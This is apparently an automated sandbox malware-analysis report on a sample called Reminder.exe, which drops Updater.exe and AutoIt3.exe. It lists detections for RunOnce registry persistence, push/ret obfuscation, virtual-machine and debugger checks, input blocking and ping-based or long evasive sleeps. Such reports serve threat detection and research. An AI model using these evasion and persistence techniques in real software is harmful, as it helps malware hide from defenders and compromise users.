Source: Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_006E310D
PE file contains an invalid checksum
Source: Reminder.exe Static PE information: real checksum: 0x5560c0 should be: 0x553d7f
Source: Reminder.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x343f79
Source: Reminder.tmp.2.dr Static PE information: real checksum: 0x0 should be: 0x343f79
PE file contains sections with non-standard names
Source: Reminder.exe Static PE information: section name: .didata
Source: Reminder.tmp.0.dr Static PE information: section name: .didata
Source: Reminder.tmp.2.dr Static PE information: section name: .didata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F1046 push ecx; ret 35_2_006F1059
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B815D push 014B81A0h; ret 35_2_014B8198
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B815C push 014B81A0h; ret 35_2_014B8198
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B810D push 014B8139h; ret 35_2_014B8131
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B8105 push 014B8139h; ret 35_2_014B8131
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A236D push 014A23BEh; ret 35_2_014A23B6
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A4291 push ecx; mov dword ptr [esp], eax 35_2_014A4292
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A25ED push 014A2619h; ret 35_2_014A2611
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B858D push 014B85D0h; ret 35_2_014B85C8
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B858C push 014B85D0h; ret 35_2_014B85C8
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A25B5 push 014A25E1h; ret 35_2_014A25D9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B2723 push 014B27D0h; ret 35_2_014B27C8
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B2725 push 014B27D0h; ret 35_2_014B27C8
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B27D5 push 014B2865h; ret 35_2_014B285D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B67FD push 014B6829h; ret 35_2_014B6821
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B67A5 push 014B67F1h; ret 35_2_014B67E9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B694B push 014B6979h; ret 35_2_014B6971
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B694D push 014B6979h; ret 35_2_014B6971
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B496D push 014B4999h; ret 35_2_014B4991
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B8971 push 014B899Dh; ret 35_2_014B8995
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B6985 push 014B69B1h; ret 35_2_014B69A9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B686D push 014B6899h; ret 35_2_014B6891
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A287D push 014A28A9h; ret 35_2_014A28A1
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B6835 push 014B6861h; ret 35_2_014B6859
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B68DD push 014B6909h; ret 35_2_014B6901
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B68A5 push 014B68D1h; ret 35_2_014B68C9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A28B6 push 014A2BB9h; ret 35_2_014A2BB1
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B4B69 push 014B4B95h; ret 35_2_014B4B8D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B4B31 push 014B4B5Dh; ret 35_2_014B4B55
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B4BDA push 014B4C25h; ret 35_2_014B4C1D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B4BF9 push 014B4C25h; ret 35_2_014B4C1D
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\Desktop\Reminder.exe File created: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\friend\Updater.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\friend\is-SBSAG.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\friend\Updater.exe File created: C:\edgheaa\AutoIt3.exe Jump to dropped file
Source: C:\Users\user\Desktop\Reminder.exe File created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\friend\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcd Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcd Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcd Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcd Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00762558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 35_2_00762558
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E5D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 35_2_006E5D03
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00D02558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 38_2_00D02558
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C85D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 38_2_00C85D03
Source: C:\Users\user\Desktop\Reminder.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 1106 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_isdecmp.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\friend\Updater.exe API coverage: 5.7 %
Source: C:\edgheaa\AutoIt3.exe API coverage: 5.7 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 1.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368 Thread sleep count: 1106 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368 Thread sleep time: -33180000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2640 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_0073E180
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_0074A187
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_0074A2E4
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074A66E FindFirstFileW,Sleep,FindNextFileW,FindClose, 35_2_0074A66E
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074686D FindFirstFileW,FindNextFileW,FindClose, 35_2_0074686D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073E9BA GetFileAttributesW,FindFirstFileW,FindClose, 35_2_0073E9BA
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_007474F0 FindFirstFileW,FindClose, 35_2_007474F0
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00747591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 35_2_00747591
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_0073DE32
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A3ECD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 35_2_014A3ECD
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A17FD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 35_2_014A17FD
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A3FD5 FindFirstFileA,GetLastError, 35_2_014A3FD5
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CEA187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 38_2_00CEA187
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CDE180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 38_2_00CDE180
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CEA2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 38_2_00CEA2E4
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CEA66E FindFirstFileW,Sleep,FindNextFileW,FindClose, 38_2_00CEA66E
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CE686D FindFirstFileW,FindNextFileW,FindClose, 38_2_00CE686D
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CDE9BA GetFileAttributesW,FindFirstFileW,FindClose, 38_2_00CDE9BA
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CE74F0 FindFirstFileW,FindClose, 38_2_00CE74F0
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CE7591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 38_2_00CE7591
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CDDE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 38_2_00CDDE32
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_01653765 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 38_2_01653765
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_01651095 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 38_2_01651095
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_0165386D FindFirstFileA,GetLastError, 38_2_0165386D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_006E310D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000 Jump to behavior
Source: Reminder.tmp, 00000001.00000002.1687750310.00000000007FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: AutoIt3.exe, 0000002A.00000002.2498679993.00000000016A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmware
Source: Updater.exe, Updater.exe, 00000023.00000002.2238957940.0000000001527000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238485419.000000000143C000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238834001.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2233287021.00000000014D6000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238834001.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, AutoIt3.exe, 00000026.00000002.2409569799.000000000164A000.00000040.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2409643770.000000000169A000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2404136165.0000000001685000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2404136165.00000000016D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft hyper-v video
Source: Reminder.tmp, 00000001.00000002.1687750310.00000000007FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001447000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2940433393.0000000001474000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2940433393.0000000001479000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B2CBF LdrInitializeThunk, 35_2_014B2CBF
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074F607 BlockInput, 35_2_0074F607
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E2D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 35_2_006E2D33
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_006E310D
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F4BF4 mov eax, dword ptr fs:[00000030h] 35_2_006F4BF4
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B89A9 mov eax, dword ptr fs:[00000030h] 35_2_014B89A9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B89A9 mov eax, dword ptr fs:[00000030h] 35_2_014B89A9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B89A2 mov eax, dword ptr fs:[00000030h] 35_2_014B89A2
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B89A2 mov eax, dword ptr fs:[00000030h] 35_2_014B89A2
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B2ABD mov eax, dword ptr fs:[00000030h] 35_2_014B2ABD
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014C4916 mov eax, dword ptr fs:[00000030h] 35_2_014C4916
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C94BF4 mov eax, dword ptr fs:[00000030h] 38_2_00C94BF4
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_01662355 mov eax, dword ptr fs:[00000030h] 38_2_01662355
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_01668241 mov eax, dword ptr fs:[00000030h] 38_2_01668241
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_01668241 mov eax, dword ptr fs:[00000030h] 38_2_01668241
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_0166823A mov eax, dword ptr fs:[00000030h] 38_2_0166823A
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_0166823A mov eax, dword ptr fs:[00000030h] 38_2_0166823A
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_016741AE mov eax, dword ptr fs:[00000030h] 38_2_016741AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00444A1B mov eax, dword ptr fs:[00000030h] 41_2_00444A1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0044CC02 mov eax, dword ptr fs:[00000030h] 41_2_0044CC02
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_007320BE GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 35_2_007320BE
Enables debug privileges
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00702446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_00702446
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F0E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_006F0E4D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F0F9F SetUnhandledExceptionFilter, 35_2_006F0F9F
